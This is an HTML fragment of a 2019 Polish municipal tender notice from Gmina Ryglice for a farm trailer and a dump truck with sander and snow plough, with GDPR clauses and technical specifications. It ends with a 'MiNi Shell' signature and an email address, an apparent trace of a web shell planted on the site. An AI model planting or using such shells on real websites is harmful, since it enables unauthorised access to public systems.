<b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-03-22</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">OCHRONA DANYCH OSOBOWYCH - dotyczy Wykonawców będących osobami fizycznymi (KLAUZULA INFORMACYJNA dot. przetwarzania danych osobowych)1. Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej ,,RODO", Zamawiający informuje, że: 1)	administratorem Pani/Pana danych osobowych jest Zamawiający, tj.:Gmina Ryglice, reprezentowana przez Burmistrza Ryglic - Pawła AugustynaAdres siedziby administratora: Urząd Miejski w Ryglicach, 33-160 Ryglice, ul. Rynek 9Dane kontaktowe Zamawiającego: Tel. (14) 654 10 19, Fax: (14) 654 10 54adres strony internetowej: www.ryglice.pladres poczty elektronicznej: gmina@ryglice.pl;2)	z Inspektorem ochrony danych w Urzędzie Miejskim w Ryglicach można skontaktować się za pośrednictwem poczty elektronicznej na adres iod@ryglice.pl;3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego nr ZP.271.1.8.2019 prowadzonym w trybie przetargu nieograniczonego na usługi p.n. ,,Dostawa fabrycznie nowego sprzętu dla Gminy Ryglice";4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp oraz odpowiednie organy kontrolne w zakresie ich kompetencji;5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane te mogą być przechowywane przez okres dłuższy niż wskazany, o ile wynika to z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (t.j. dz. U. z 2018 r. poz. 217 z późn. zm.) i przepisów wykonawczych do tej ustawy;6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;8)	posiada Pani/Pan:-	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;-	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);-	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);-	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;9)	nie przysługuje Pani/Panu:-	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;-	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;-	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.2. Wykonawca obowiązany jest wypełnić obowiązki informacyjne przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu (Wyjaśnienie: w przypadku gdy Wykonawca nie przekazuje danych osobowych innych niż bezpośrednio jego dotyczących lub zachodzi wyłączenie stosowania obowiązku informacyjnego, stosownie do art. 13 ust. 4 lub art. 14 ust. 5 RODO treści oświadczenia wykonawca w formularzu ofertowym (wzór załącznik nr 1 do SIWZ) nie składa (usunięcie treści oświadczenia np. przez jego wykreślenie).</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Część I: Dostawa fabrycznie nowej przyczepy o ładowność 8 ton do ciągnika rolniczego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część I. ,,Dostawa fabrycznie nowej przyczepy o ładowność 8 ton do ciągnika rolniczego":Przedmiotem zamówienia jest dostawa przyczepy o ładowności 8 ton, fabrycznie nowej, rok produkcji 2018 lub 2019 o następujących parametrach technicznych:1)	Dwie osie.2)	Wywrót trójstronny.3)	Przystosowana do współpracy z ciągnikiem rolniczym.4)	Dopuszczalna masa całkowita maksimum 11 000 kg.5)	Ładowność 8 000 kg.6)	Długość skrzyni załadunkowej min. 4 200 mm.7)	Szerokość skrzyni załadunkowej - trapez: min. 2 150/2 200 mm.8)	Wysokość ścian skrzyni min. 500 mm.9)	Grubość blachy podłogi min. 4 mm.10) Wysokość platformy od podłoża maksimum 1 250 mm.11) Centralny system ryglowania ścian.12) Linka spinająca ściany.13) Sprężyny wspomagające otwieranie ścian bocznych.14) Drabinka, dyszel typu V z zaczepem sztywnym, oko zaczepu ? 40 mm.15) Instalacja hamulcowa pneumatyczna dwuprzewodowa.16) Instalacja hamulcowa hydrauliczna.17) Postojowy hamulec ręczny z korbą.18) Instalacja oświetlenia 12V spełniająca wymogi ruchu drogowego.19) Tylne lampy oświetleniowe z kratkami zabezpieczającymi przed uszkodzeniem.20) Hydrauliczna stopa podporowa.21) Ogumienie nie mniejsze niż 400/60-15,5.22) Dwa kliny pod koła.23) Koło zapasowe mocowane pod podłogą.24) Plandeka ze stelażem.25) Przyczepa przystosowany do zespolenia z drugą przyczepą - zaczep tylny oraz układ hydrauliczny, hamulcowy i elektryczny do następnej przyczepy.26) Trójkąt wyróżniający pojazdy wolno poruszające się.27) Najazdy aluminiowe o szerokości min. 50 cm, długości min. 4 m, udźwigu min. 6 500 kg.28) Najazdy ze standardowym typem mocowania - płetwą.29) Najazdy powinny spełniać wszelkie normy wytrzymałościowe, tj. posiadać certyfikat TUV będący gwarancją jakości.30) Podpory stabilizujące pod najazdy.31) Przyczepa posiada certyfikat CE, świadectwo homologacji.Pozostałe wymogi zamówienia:1)	Wymagany okres gwarancji min. 24 m-ce liczone od daty podpisania protokołu odbioru końcowego.2)	Wykonawca zapewnia serwis gwarancyjny i pogwarancyjny z czasem reakcji serwisu do 2 dni roboczych od momentu zgłoszenia usterki.3)	Dostawa przyczepy do siedziby Zamawiającego.4) Komplet dokumentów do rejestracji na terytorium Rzeczpospolitej Polskiej.5)	Termin dostawy - maksymalnie do 21 dni od daty zawarcia umowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>16000000-5, 16500000-0, 16520000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">GWARANCJA</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Część II: ,,Dostawa fabrycznie nowego samochodu ciężarowego typu wywrotka wraz z dodatkowym osprzętem, tj. nową piaskarką i pługiem do odśnieżania"</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część II. ,,Dostawa fabrycznie nowego samochodu ciężarowego typu wywrotka wraz z dodatkowym osprzętem, tj. nową piaskarką i pługiem do odśnieżania". Przedmiotem zamówienia jest dostawa fabrycznie nowego samochodu ciężarowego typu wywrotka, wraz z dodatkowym osprzętem, tj. nową piaskarką i pługiem do odśnieżania:1)	Fabrycznie nowy samochód ciężarowy, rok produkcji: 2018 lub 2019, musi posiadać certyfikat zgodności z normami CE i być dopuszczony do ruchu na terytorium Rzeczpospolitej Polskiej.2)	Podwozie dwuosiowe, układ napędowy 4x4, przystosowane do montażu zabudowy samowyładowczej typ 3W.3)	Dopuszczalna całkowita masa pojazdu maksymalnie 16 000 kg.4)	Silnik o mocy min 280 KM, maksimum 320 KM oraz pojemność od 8 000 cm3 do 10 000 cm3, spełniający normę emisji spalin minimum EURO 6 doładowany turbosprężarką o zmiennej geometrii.5)	Silnik 6-cio cylindrowy wysokoprężny.6)	Skrzynia biegów manualna, synchronizowana.7)	Skrzynia rozdzielcza pracująca w sposób ciągły w układzie 4x4, z między mostowym mechanizmem różnicowym, osłoniętym osłoną stalową.8)	Most napędowy z przełożeniem bezpośrednim i blokadą mechanizmu różnicowego.9)	Elektropneumatyczne sterowanie przełożeniami i blokadą między mostową.10) Przystawka odbioru mocy.11) Przystawka odbioru mocy (PTO) dopasowana do zabudowy wraz z oprogramowaniem fabrycznym.12) Przystawka odbioru mocy od skrzyni biegów do napędu hydrauliki wywrotu.13) Podwozie samochodu ciężarowego przystosowane do pracy w zimnych warunkach klimatycznych, przy temperaturach spadających poniżej -12 stopni Celsjusza.14) Prześwit - przód z obciążnikiem - nie mniej niż 315 cm.15) Prześwit - tył z obciążnikiem - nie mniej niż 300 cm.16) Przednie zawieszenie wyposażone w paraboliczne resory ze stabilizatorem.17) Oś tylna - zawieszenie pneumatyczne.18) Hamulec silnikowy (wydechowy).19) Układ hamulcowy dwuobwodowy - hamulce bębnowe.20) Hamulec ręczny sterowany pneumatycznie.21) Instalacja hydrauliczna, pneumatyczna i elektryczna 24 V.22) Gniazda 12V i 24V w kabinie.23) Główny włącznik prądu na zewnątrz samochodu.24) Kabina 3 - osobowa, siedzenie 2 - osobowe (2 - miejscowa ławka) ze schowkiem zamykanym.25) Fotel kierowcy pneumatyczny, wszystkie fotele z zagłówkiem i pasami bezpieczeństwa.26) Poduszka powietrzna dla kierowcy.27) Układ kierowniczy lewostronny, z regulowaną kolumną kierowniczą.28) Kabina klimatyzowana.29) Tylna ściana kabiny z oknem.30) Dwa podgrzewane lusterka wsteczne, regulowane elektrycznie.31) Dwa lusterka szerokokątne, lusterko rampowe, lusterko przed szybą przednią (dojazdowe przednie) - zgodnie z wymogami UE.32) Ogrzewana szyba przednia z osłoną przeciwsłoneczną.33) Szyby boczne sterowane elektrycznie.34) Komputer pokładowy z menu w języku polskim.35) Zderzak stalowy.36) Światło ostrzegawcze umieszczone nad kabiną pojazdu (lampa zespolona z napisem podświetlanym ,,GMINA RYGLICE" - kolor światła żółty).37) Tylna lampa przeciwmgielna. Halogen oświetlenie pola pracy z tyłu pojazdu.38) Reflektory i lampy osłonięte siatką ochronną, umieszczone na wysokości uwzględniającej pracę z pługiem czołowym.39) Osłony tylnych świateł (uchylne kratki).40) Elektroniczny ogranicznik prędkości.41) Zbiornik paliwa o pojemności nie mniejszej niż 200 litrów.42) Zbiornik płynu AdBlue.43) System ABS.44) System EBS.45) Wskaźnik ciśnienia w ogumieniu umieszczony na desce rozdzielczej.46) Tachograf cyfrowy.47) Dźwiękowy sygnał biegu wstecznego.48) Zamek centralny z pilotem.49) Podwozie wyposażone w złącza elektryczne i hydrauliczne do sterowania i obsługi pługa i posypywarki.50) Płyta czołowa umożliwiająca montaż pługa odśnieżającego.51) Instalacja umożliwiająca sterowanie joystickiem z samochodu pługiem i piaskarką.52) Pojazd przystosowany do zespolenia z drugą przyczepą (układ hydrauliczny, elektryczny, pneumatyczny).53) Standardowa tabliczka znamionowa.54) Łańcuchy śniegowe na przednie koła samochodu.55) Kabina wyposażona w instalację radiową i antenową oraz radio.Zabudowa typu wywrotka trójstronna 3W:1)	Długość zabudowy ok. 5 000 mm.2)	Szerokość zabudowy ok. 2 550 mm.3)	Wysokość burt 600 mm.4)	Zabudowa zamontowana na podwoziu.5)	Podłoga stalowa zabezpieczona antykorozyjnie o podwyższonej wytrzymałości od 5,0 do 6,0 mm.6)	Burty boczne stalowe - nie dzielone, otwierane (uchylne) z zawiasami dolnymi i górnymi o podwyższonej wytrzymałości.7)	Burta tylna min. 5 mm z zawiasami górnymi i dolnymi, możliwość demontażu tylnych słupków, otwierana automatycznie podczas wywrotu, demontowalna.8)	Burta przednia zakończona małym daszkiem.9)	Plandeka rolowana umieszczona na przedniej burcie.10) Siłownik hydrauliczny podpodłogowy.11) Pompa hydrauliczna.12) Zbiornik oleju z filtrem.13) Sterowanie wywrotem z kabiny - pneumatyczne.14) Kontrolka podniesienia skrzyni na pulpicie kierowcy.15) Drabinka ułatwiająca wejście na skrzynię ładunkową na burcie przedniej - rozkładana.16) Uchwyty do mocowania posypywarki - min. 4 szt. - zamontowane w podłodze skrzyni ładunkowej.17) Zderzak składany z homologacją.18) Błotniki na koła.19) Mocowanie koła zapasowego za kabiną.20) Światła obrysowe żółte.21) Oklejenie konturowe taśmami odblaskowymi.22) Tablice wyróżniające zgodnie z obowiązującymi przepisami.23) Łopata mocowana pod podłogą.Pozostałe wymogi zamówienia:1)	Samochód powinien posiadać na wyposażeniu: apteczkę, gaśnicę, trójkąt ostrzegawczy, klin pod koła - 2 szt., dywaniki gumowe, pokrowce na siedzenia, kamizelkę odblaskową dla kierowcy, przewód do pompowania kół, podnośnik hydrauliczny dostosowany do pojazdu, skrzynkę narzędziową ze standardowymi narzędziami, koło zapasowe.2)	Kolor podwozia oraz zabudowy do uzgodnienia na etapie realizacji zamówienia.3)	Oznakowanie i oświetlenie zgodne z obowiązującymi przepisami.4)	Instrukcja obsługi i katalog części zamiennych w języku polskim zostaną dostarczone przez Wykonawcę wraz z przekazanym sprzętem. 5)	Szkolenie minimum 2 pracowników wskazanych przez Zamawiającego w miejscu i dniu dostawy pojazdu.6)	Gwarancja min. 24 miesiące na cały pojazd.7)	Serwis gwarancyjny i przeglądy okresowe w okresie gwarancji mają być świadczone w miejscu postoju samochodu nieodpłatnie, z wyjątkiem materiałów podlegających okresowej wymianie oraz kosztów dojazdu.8)	Dostawa przedmiotu zamówienia do siedziby Zamawiającego.9)	Dostawa samochodu z pełnym zbiornikiem paliwa.10)	Komplet dokumentów do rejestracji na terytorium Rzeczpospolitej Polskiej.11)	Termin realizacji: maksymalnie do 30.06.2019 roku.Piaskarka:1)	Piaskarka z hydraulicznie napędzanym przenośnikiem taśmowym.2)	Przyłącza hydrauliczne - tył i bok.3)	Skrzynia ładunkowa o pojemności 2,5 m3 wykonana ze stali z dwustronnym zabezpieczeniem antykorozyjnym.4)	Szerokość rozsypywania - od 2 m do 10 m.5)	Masa własna maszyny maksymalnie 2 000 kg.6)	Skrzynia wyposażona w sito, ruchomy obciążnik materiałów sypkich oraz w plandekę.7)	Hydraulicznie napędzany przenośnik taśmowy i talerz rozrzutnika.8)	Rynna zsypowa i talerz rozrzutnika ze stali kwasoodpornej.9)	Sterowanie automatyczne pracą piaskarki z kabiny kierowcy w zakresie: załącz, wyłącz, regulacja, gęstości oraz szerokości sypania.10)	Oświetlenie robocze i ostrzegawcze zgodnie z obowiązującymi przepisami.11) Napęd piaskarki od przystawki samochodu.12)	Posiada wymagane prawem atesty i homologacje.Pozostałe wymogi zamówienia:1)	Kolor do uzgodnienia na etapie realizacji zamówienia.2)	Instrukcja obsługi i katalog części zamiennych w języku polskim zostaną dostarczone przez Wykonawcę wraz z przekazanym sprzętem. 3)	Szkolenie minimum 2 pracowników wskazanych przez Zamawiającego w miejscu dostawy pojazdu.4)	Gwarancja min. 24 miesiące na cały sprzęt.5)	Serwis gwarancyjny w okresie gwarancji ma być świadczony w miejscu postoju piaskarki nieodpłatnie, z wyjątkiem materiałów podlegających okresowej wymianie oraz kosztów dojazdu.6) Dostawa przedmiotu zamówienia do siedziby Zamawiającego.7)	Termin realizacji: maksymalnie do 30.06.2019 rok.Pług do odśnieżania:1)	Szerokość robocza - minimum 2600mm, maksimum 3000mm.2)	Ilość pozycji roboczych: 3.3)	Masa własna maszyny od 500 do 650 kg.4)	Wysokość robocza min. 1 050 mm.5)	Sterowanie z kabiny kierowcy.6)	Zasilanie hydrauliczne, elektryczne, zapotrzebowanie mocy dostosowane do samochodu ciężarowego.7)	Oświetlenie obrysowe i drogowe.8)	Lemiesze gumowe.9)	Lemiesz uchylny.10)	Zabezpieczenie przeciążeniowe.11)	Bezawaryjne i bezpieczne pokonywanie przeszkód drogowych (system ,,by-pass") - funkcja wychylania się pługa przy najechaniu na przeszkodę.12)	Koła podporowe z płynną regulacją wysokości pługa.13)	Tablice ostrzegawcze.14)	Posiada wymagane prawem atesty i homologacje.Pozostałe wymogi zamówienia:1)	Kolor do uzgodnienia na etapie realizacji zamówienia.2)	Instrukcja obsługi i katalog części zamiennych w języku polskim zostaną dostarczone przez Wykonawcę wraz z przekazanym sprzętem. 3)	Szkolenie minimum 2 pracowników wskazanych przez Zamawiającego w miejscu dostawy pojazdu.4)	Gwarancja min. 24 miesiące na cały sprzęt.5)	Serwis gwarancyjny w okresie gwarancji ma być świadczony w miejscu postoju piaskarki nieodpłatnie, z wyjątkiem materiałów podlegających okresowej wymianie oraz kosztów dojazdu.6) Dostawa przedmiotu zamówienia do siedziby Zamawiającego.7)	Termin realizacji: maksymalnie do 30.06.2019 rok.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>34000000-7, 43000000-3, 34100000-8, 34139000-0, 34139100-1, 34140000-0, 34144400-2, 34144440-4, 43300000-6, 43310000-9, 43313000-0, 43313100-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA oferty brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">GWARANCJA</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com